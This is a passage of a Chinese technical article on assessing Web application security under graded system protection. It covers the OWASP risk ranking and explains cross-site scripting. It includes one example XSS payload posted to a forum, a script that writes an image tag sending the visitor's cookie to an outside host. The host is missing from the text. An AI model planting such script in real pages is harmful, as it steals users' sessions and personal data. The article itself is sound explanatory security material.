系統等级保护中的Web应用安全评估-精.docxVIP

系统等级保护中的Web应用安全评估摘要：Web应用安全评估是系统等级保护评估中的重要一环，本文以实例分析了常见Web应用漏洞的形成原理，介绍了相应的评估实施方法，并给出了增强Web应用安全性的实用性建议。关键词：Web应用安全评估系统等级保护跨站脚本 SQL注入【本文作者：李毅、顾健、顾铁军，转载请注明】1.引言当今世界，因特网已经成为一个非常重要的基础平台，很多单位都将应用架设在该平台上，为客户提供更为方便、快捷的服务支持。这些应用在功能和性能上，都在不断的完善和提高，然而在非常重要的安全性上，却没有得到足够的重视。由于网络技术日趋成熟，黑客们也将注意力从以往对网络服务器的攻击逐步转移到了对Web应用的攻击上。根据 Gartner 的最新调查，信息安全攻击有 75% 都是发生在 Web应用而非网络层面上。同时，数据也显示，三分之二的Web站点都相当脆弱。然而现实中绝大多数的投资都花费在网络和服务器的安全上，没有从真正意义上保证Web应用本身的安全，给黑客以可乘之机。在Web应用的各个层面，都会使用不同的技术来确保安全性。为了保护服务端机器的安全，用户会安装防病毒软件；为了保证用户数据传输到Web服务器的传输安全，通信层通常会使用SSL（安全套接层）技术加密数据；使用防火墙和IDS（入侵诊断系统）/IPS（入侵防御系统）来保证只允许特定的访问，其他不必要暴露的端口和非法的访问，在这里都会被阻止。但是，即便有防病毒保护、防火墙和 IDS/IPS，仍然不得不允许一部分的通讯经过防火墙，毕竟Web应用的目的是为用户提供服务，保护措施可以关闭不必要暴露的端口，但是 Web应用必须的 80 和 443 端口，是一定要开放的。可以顺利通过的这部分通讯，可能是善意的，也可能是恶意的，很难辨别。这里需要注意的是，Web 应用是由软件构成的，那么，它一定会包含缺陷（bugs），这些缺陷就可以被恶意的用户利用，他们通过执行各种恶意的操作，偷窃、操控或破坏 Web应用中的重要信息。通常用户会采用网络脆弱性扫描工具来检查Web服务器的漏洞，但是常规的网络脆弱性扫描工具仅仅用来分析网络层面的漏洞，而不是Web应用本身，所以不能彻底提高Web应用安全性。只要访问可以顺利通过企业的防火墙，Web应用就毫无保留的呈现在用户面前。只有加强Web应用自身的安全，才是真正的Web应用安全解决之道。Web应用已经成为现今各类信息系统中不可或缺的组成部分，因此在系统等级保护评估中对Web应用安全的评估成为整个安全评估工作中重要一环，而且由于Web应用漏洞存在的普遍性以及对Web应用漏洞利用的直观性，这方面的评估对被评估方具有很强的现实意义，对引导被评估方重新审视自己系统的安全性也更有说服力。本文从常见的Web应用漏洞原理入手，介绍了常用的Web应用安全评估方法，并给出了在评估后对被评估方的实用建议。2.常见的Web应用漏洞OWASP（Open Web Application Security Project）是一个专注于研究Web应用安全的国际性组织。在其的一份报告中列举出了常见的十大 Web 应用安全隐患，见图1：图1 OWASP Web应用安全隐患排名从图中可以看出有两个概率最高的攻击手段，它们分别是“跨站点脚本攻击”（Cross-Site Scripting）和“注入缺陷”（Injection Flaws）。下面将通过举例来说明这两种攻击是如何实施的。2.1.跨站脚本攻击跨站脚本攻击指的是攻击者往Web页面里插入恶意html代码，当用户浏览该页面时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的，其攻击对象主要是Web应用的访问者而非Web应用系统本身。跨站脚本攻击属于被动式的攻击，因为需要访问特定Web页面才能进行攻击，因为其被动且不好利用，所以许多人常忽略其危害性。跨站脚本攻击得以实现的前提是可以在Web页面中插入特定的html代码，这一般是通过利用Web应用对提交数据的检查漏洞来完成。以BBS为例，如果Web应用没有对用户的输入进行检查，恶意攻击者可以在BBS的输入框中提交如下内容：你好script language=’javascript’document.write(img src=/getCookies+?c=+document.cookie+);script/当访问者访问到该攻击者的发言时，看到的是“你好”两个字，但是他不知道，他的cookie信息已经被发送到了。而cookie信息中往往包含了用户的注册信息等及其敏感的数据，如果是银行注册信息等，后果将不堪设想。除了获取cookie信息，跨站脚本攻击还可造成的危害有：屏蔽页面特定信息、伪造页面信息、拒绝服务攻击、突破外网内网不同安全设置、与其它漏洞结合修改系统设置、执行系统命令